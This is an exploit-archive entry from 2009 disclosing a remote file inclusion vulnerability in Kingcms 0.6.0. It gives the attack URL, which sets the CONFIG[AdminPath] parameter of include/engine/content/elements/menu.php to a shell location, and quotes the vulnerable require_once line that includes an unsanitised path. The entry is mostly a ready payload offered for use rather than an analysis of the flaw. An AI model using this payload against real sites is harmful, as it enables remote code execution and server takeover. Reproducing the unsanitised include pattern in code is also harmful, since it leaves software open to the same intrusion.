[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Kingcms 0.6.0 (menu.php) Remote File Inclusion Vulnerability
# Published : 2009-09-01
# Author : CoBRa_21
# Previous Title : Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerabilities
# Next Title : phpBB3 addon prime_quick_style GetAdmin Vulnerability
-------------------------------------------------------------------------------------
Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability
-------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu[at]windowslive[dot]com
Script Download: http://sourceforge.net/projects/kingcms/
-------------------------------------------------------------------------------------
EXPLO?°T:
http://localhost/[PATH]/include/engine/content/elements/menu.php? CONFIG[AdminPath] =[SHELL]
-------------------------------------------------------------------------------------
BUG:
<?
require_once($CONFIG['AdminPath'] . "/include/engine/folder.php");
# www.Syue.com [2009-09-01]